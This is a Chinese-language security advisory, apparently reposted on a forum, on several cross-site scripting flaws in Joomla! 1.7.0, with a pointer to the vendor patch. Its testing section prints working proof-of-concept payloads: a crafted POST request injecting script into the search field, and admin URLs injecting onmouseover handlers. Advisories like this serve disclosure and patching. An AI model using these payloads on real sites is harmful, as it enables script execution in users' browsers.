Joomla! 1.7.0多个跨站脚本执行漏洞
Joomla! 1.7.0多个跨站脚本执行漏洞
发布日期:2011-09-29
更新日期:2011-10-10
受影响系统:
Joomla! Joomla! 1.7.0
描述:
--------------------------------------------------------------------------------
Joomla!是一款开放源码的内容管理系统(CMS)。
Joomla!的核心组件在实现上存在安全漏洞,恶意攻击者利用此漏洞通过特制的URL在用户浏览器中执行任意脚本代码。
Joomla! Core组件中的多个参数(searchword、extension、asset、author)没有经过正确过滤,随即提交给/index.php ,导致了XSS攻击。
<*来源:Aung Khant
链接:http://seclists.org/bugtraq/2011/Sep/192
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
component: com_search, parameter: searchword (Browser: IE, Konqueror)
=====================================================================
POST /joomla17_noseo/index.php HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: MSIE 8.0
Connection: close
Referer: http://localhost/joomla17_noseo
Content-Type: application/x-www-form-urlencoded
Content-Length: 456
task=search&Itemid=435&searchword=Search';onunload=function(){x=confirm(String.fromCharCode(89,111,117,39,118,101,32,103,111,116,32,97,32,109,101,115,115,97,103,101,32,102,114,111,109,32,65,100,109,105,110,105,115,116,114,97,116,111,114,33,10,68,111,32,121,111,117,32,119,97,110,116,32,116,111,32,103,111,32,116,111,32,73,110,98,111,120,63));alert(String.fromCharCode(89,111,117,39,118,101,32,103,111,116,32,88,83,83,33));};//xsssssssssss&option=com_search
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
User Login is required to execute the following XSSes.
Parameter: extension, Component: com_categories
====================================================
http://localhost/joomla17_noseo/administrator/index.php?option=com_categories&extension=com_content%20%22onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22%20x=%22
Parameter: asset , Component: com_media
====================================================
http://localhost/joomla17_noseo/administrator/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=1%22%20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22x=%22&author=
Parameter: author, Component: com_media
====================================================
http://localhost/joomla17_noseo/administrator/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=&author=1%22%20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22x=%22
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
建议:
--------------------------------------------------------------------------------
厂商补丁:
Joomla!
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.joomla.org/ 谢谢哦
页:
[1]